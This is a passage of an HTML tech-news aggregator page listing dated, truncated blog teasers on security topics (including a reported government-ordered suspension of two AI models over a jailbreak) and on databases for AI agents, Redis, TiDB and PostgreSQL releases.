              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A government order abruptly took down a powerful AI model, exposing a new kind of supply chain risk for engineering teams. Security leaders need contingency plans before the next model disappears.</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/government-ban-ai-model-engineer-perspective/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-when-a-government-pulls-an-ai-model-what-the-fable-5-and-mythos-5-suspension-means-for-security-teams" class="group relative scroll-mt-24">
        <a href="#h3-when-a-government-pulls-an-ai-model-what-the-fable-5-and-mythos-5-suspension-means-for-security-teams" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 When a Government Pulls an AI Model: What the Fable 5 and Mythos 5 Suspension Means for Security Teams
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-when-a-government-pulls-an-ai-model-what-the-fable-5-and-mythos-5-suspension-means-for-security-teams"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>On June 12, 2026, a US export-control directive led Anthropic to disable Claude Fable 5 and Mythos 5 worldwide over a reported jailbreak. The reported trigger was a code-analysis capability that defen</p>
<p><strong>📅 Jun 14, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/fable-mythos-suspension-security-takeaways/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scaling-security-insights-how-we-achieved-a-10x-increase-in-global-scanning-capacity" class="group relative scroll-mt-24">
        <a href="#h3-scaling-security-insights-how-we-achieved-a-10x-increase-in-global-scanning-capacity" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Scaling Security Insights: how we achieved a 10x increase in global scanning capacity
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-scaling-security-insights-how-we-achieved-a-10x-increase-in-global-scanning-capacity"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Cloudflare Security Insights system now processes over 120 scans per second, providing frequent insights for all customers. By optimizing Kafka consumers, Postgres queries, and our API, we scaled our </p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 Cloudflare Blog</strong></p>
<p><a href="https://blog.cloudflare.com/scaling-security-scans/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-suse-at-gitex-ai-europe-2026-empowering-sovereign-digital-transformation-and-enterprise-ai" class="group relative scroll-mt-24">
        <a href="#h3-suse-at-gitex-ai-europe-2026-empowering-sovereign-digital-transformation-and-enterprise-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 SUSE at GITEX AI Europe 2026: Empowering Sovereign Digital Transformation and Enterprise AI
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-suse-at-gitex-ai-europe-2026-empowering-sovereign-digital-transformation-and-enterprise-ai"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>As European enterprises drive toward a bold, open and connected digital future, the race to implement artificial intelligence is accelerating. However, scaling AI workloads while maintaining complete </p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/suse-at-gitex-ai-europe-2026-empowering-sovereign-digital-transformation-and-enterprise-ai/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-powering-the-next-era-of-confidential-ai" class="group relative scroll-mt-24">
        <a href="#h3-powering-the-next-era-of-confidential-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Powering the next era of Confidential AI
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-powering-the-next-era-of-confidential-ai"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>At Google Cloud, we’re committed to providing the most advanced, secure, and private infrastructure for the most demanding AI workloads, and partnering with a broad and diverse range of organizations </p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/identity-security/powering-the-next-era-of-confidential-ai/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-copilot-autofix-for-github-advanced-security-for-azure-devops" class="group relative scroll-mt-24">
        <a href="#h3-copilot-autofix-for-github-advanced-security-for-azure-devops" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Copilot Autofix for GitHub Advanced Security for Azure DevOps
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-copilot-autofix-for-github-advanced-security-for-azure-devops"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Over the last few years, we’ve encouraged customers to move their repositories from Azure Repos to GitHub, where the newest AI-powered and agentic development experiences land first. Migrating isn’t e</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 Azure DevOps Blog</strong></p>
<p><a href="https://devblogs.microsoft.com/devops/copilot-autofix-for-github-advanced-security-for-azure-devops/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-defend-against-frontier-cyber-models-cloudflares-architecture-as-customer-zero" class="group relative scroll-mt-24">
        <a href="#h3-defend-against-frontier-cyber-models-cloudflares-architecture-as-customer-zero" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Defend against frontier cyber models: Cloudflare's architecture as customer zero
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-defend-against-frontier-cyber-models-cloudflares-architecture-as-customer-zero"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In our post about Project Glasswing, we made the argument that the architecture around a vulnerability matters more than the speed of the patch. Here we walk through what that architecture looks like,</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 Cloudflare Blog</strong></p>
<p><a href="https://blog.cloudflare.com/frontier-model-defense/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-5-software-supply-chain-security-best-practices-for-development-teams" class="group relative scroll-mt-24">
        <a href="#h3-5-software-supply-chain-security-best-practices-for-development-teams" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 5 Software Supply Chain Security Best Practices for Development Teams
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-5-software-supply-chain-security-best-practices-for-development-teams"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Understanding software supply chain security is one thing. Putting it into practice across a real pipeline, with real deadlines and real constraints, is another. Most organizations recognize that thei</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/software-supply-chain-security-best-practices/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-databases" class="group relative scroll-mt-24">
        <a href="#h2-databases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          💾 Databases
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-databases"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-database-branching-for-ai-agents-how-tine-solves-the-schema-drift-problem" class="group relative scroll-mt-24">
        <a href="#h3-database-branching-for-ai-agents-how-tine-solves-the-schema-drift-problem" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Database Branching for AI Agents: How TINE Solves the Schema Drift Problem
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-database-branching-for-ai-agents-how-tine-solves-the-schema-drift-problem"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Key Takeaways AI coding agents are no longer a novelty. From Claude Code to Cursor’s agent mode, from GitHub Copilot Workspace to OpenAI Codex, “generate an app from a prompt” demos flood developer fe</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/database-branching-ai-agents-tine/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-conways-law-in-reverse-why-ai-agents-need-one-database-not-ten" class="group relative scroll-mt-24">
        <a href="#h3-conways-law-in-reverse-why-ai-agents-need-one-database-not-ten" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Conway’s Law in Reverse: Why AI Agents Need One Database, Not Ten
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-conways-law-in-reverse-why-ai-agents-need-one-database-not-ten"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Agentic AI did not create a new kind of database. It revealed which ones were already built for it. Across 2026 so far, a wave of large software companies have cut tens of thousands of roles and expla</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/database-consolidation-for-ai-agents/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-production-ready-agents-need-a-production-ready-data-platform" class="group relative scroll-mt-24">
        <a href="#h3-production-ready-agents-need-a-production-ready-data-platform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Production-Ready Agents Need A Production-Ready Data Platform
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-production-ready-agents-need-a-production-ready-data-platform"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>There’s a common theme to the conversations I’ve been having with AI teams lately: change. Constant, head-spinning change. Teams across industries are evaluating and re-evaluating model providers, age</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 MongoDB Blog</strong></p>
<p><a href="https://www.mongodb.com/company/blog/innovation/production-ready-agents-need-production-ready-data-platform"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-scylladb-customer-experience-spotlight-faisal-saeed" class="group relative scroll-mt-24">
        <a href="#h3-scylladb-customer-experience-spotlight-faisal-saeed" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 ScyllaDB Customer Experience Spotlight: Faisal Saeed
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-scylladb-customer-experience-spotlight-faisal-saeed"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Welcome to the second installment of a new blog series introducing some of the experts you might encounter when you work with ScyllaDB. (In the first, we met Tyler Denton, Solutions Architect). Today </p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/06/11/cx-spotlight-faisal-saeed/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-connect-your-redis-index-to-ai-agents-with-redisvl-mcp" class="group relative scroll-mt-24">
        <a href="#h3-connect-your-redis-index-to-ai-agents-with-redisvl-mcp" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Connect Your Redis index to AI agents with RedisVL MCP
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-connect-your-redis-index-to-ai-agents-with-redisvl-mcp"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>If you already use Redis for search, retrieval, or application memory, the RedisVL MCP is a practical next step: making that data available to agents without rebuilding your integration for every fram</p>
<p><strong>📅 Jun 11, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/connect-your-redis-index-to-ai-agents-with-redisvl-mcp/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-build-persistent-scalable-ai-agent-memory-with-tidb" class="group relative scroll-mt-24">
        <a href="#h3-build-persistent-scalable-ai-agent-memory-with-tidb" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Build Persistent, Scalable AI Agent Memory with TiDB
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-build-persistent-scalable-ai-agent-memory-with-tidb"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>I gave a session at Microsoft Build 2026 on agent memory with TiDB. A few people asked for the code afterward, so here’s a complete write up of the session: The same pattern as the talk, with copy-pas</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/agent-memory-database-tidb/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-im-returning-to-the-distributed-sql-summit" class="group relative scroll-mt-24">
        <a href="#h3-why-im-returning-to-the-distributed-sql-summit" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why I’m Returning to the Distributed SQL Summit
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-why-im-returning-to-the-distributed-sql-summit"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The Distributed SQL Summit showcases how you can use YugabyteDB to power GenAI applications, explores real-world use cases, and provides practical demonstrations of best practices to help you build ul</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 Yugabyte Blog</strong></p>
<p><a href="https://www.yugabyte.com/blog/why-im-returning-to-the-distributed-sql-summit/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-real-time-fraud-detection-for-financial-transactions" class="group relative scroll-mt-24">
        <a href="#h3-real-time-fraud-detection-for-financial-transactions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Real-time fraud detection for financial transactions
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-real-time-fraud-detection-for-financial-transactions"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>When a customer taps &quot;pay,&quot; a clock starts that your fraud system can&#39;t pause. The payment authorization resolves in a fixed window whether your model has scored the transaction or not. If it hasn&#39;t, </p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/real-time-fraud-detection/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-context-windows-in-ai-why-every-token-is-a-budget-decision" class="group relative scroll-mt-24">
        <a href="#h3-context-windows-in-ai-why-every-token-is-a-budget-decision" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Context windows in AI: why every token is a budget decision
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-context-windows-in-ai-why-every-token-is-a-budget-decision"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Some of today&#39;s most capable LLMs now support very large context windows. That doesn&#39;t mean you should fill them. Context windows have grown fast, but the underlying cost and quality tradeoffs haven&#39;t</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/context-window-ai/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-connecting-to-redis-cloud-with-aws-privatelink-vs-vpc-peering" class="group relative scroll-mt-24">
        <a href="#h3-connecting-to-redis-cloud-with-aws-privatelink-vs-vpc-peering" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Connecting to Redis Cloud with AWS PrivateLink vs. VPC peering
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-connecting-to-redis-cloud-with-aws-privatelink-vs-vpc-peering"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AWS PrivateLink resource endpoints are now generally available across all Redis Cloud Pro subscription types, including Redis Flex and Active-Active deployments. That means you can connect apps to Red</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/connecting-to-redis-cloud-with-aws-privatelink-vs-vpc-peering/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pgpool-ii-472-467-4512-4417-and-4320-released" class="group relative scroll-mt-24">
        <a href="#h3-pgpool-ii-472-467-4512-4417-and-4320-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Pgpool-II 4.7.2, 4.6.7, 4.5.12, 4.4.17 and 4.3.20 released.
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-pgpool-ii-472-467-4512-4417-and-4320-released"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>What is Pgpool-II? Pgpool-II is a tool to add useful features to PostgreSQL, including: connection pooling load balancing automatic failover and more. Minor releases Pgpool Global Development Group is</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pgpool-ii-472-467-4512-4417-and-4320-released-3314/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-postgresql-anonymizer-31-introducing-local-differential-privacy" class="group relative scroll-mt-24">
        <a href="#h3-postgresql-anonymizer-31-introducing-local-differential-privacy" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 PostgreSQL Anonymizer 3.1 : Introducing Local Differential Privacy
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-postgresql-anonymizer-31-introducing-local-differential-privacy"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Eymoutiers, France, May 27th, 2026 Dalibo is pleased to announce PostgreSQL Anonymizer 3.1 introducing innovative data masking techniques to protect your data ! Enhanced Privacy Protection for Your Da</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/postgresql-anonymizer-31-introducing-local-differential-privacy-3311/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-platforms" class="group relative scroll-mt-24">
        <a href="#h2-platforms" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🌐 Platforms
        </a>
        <button 
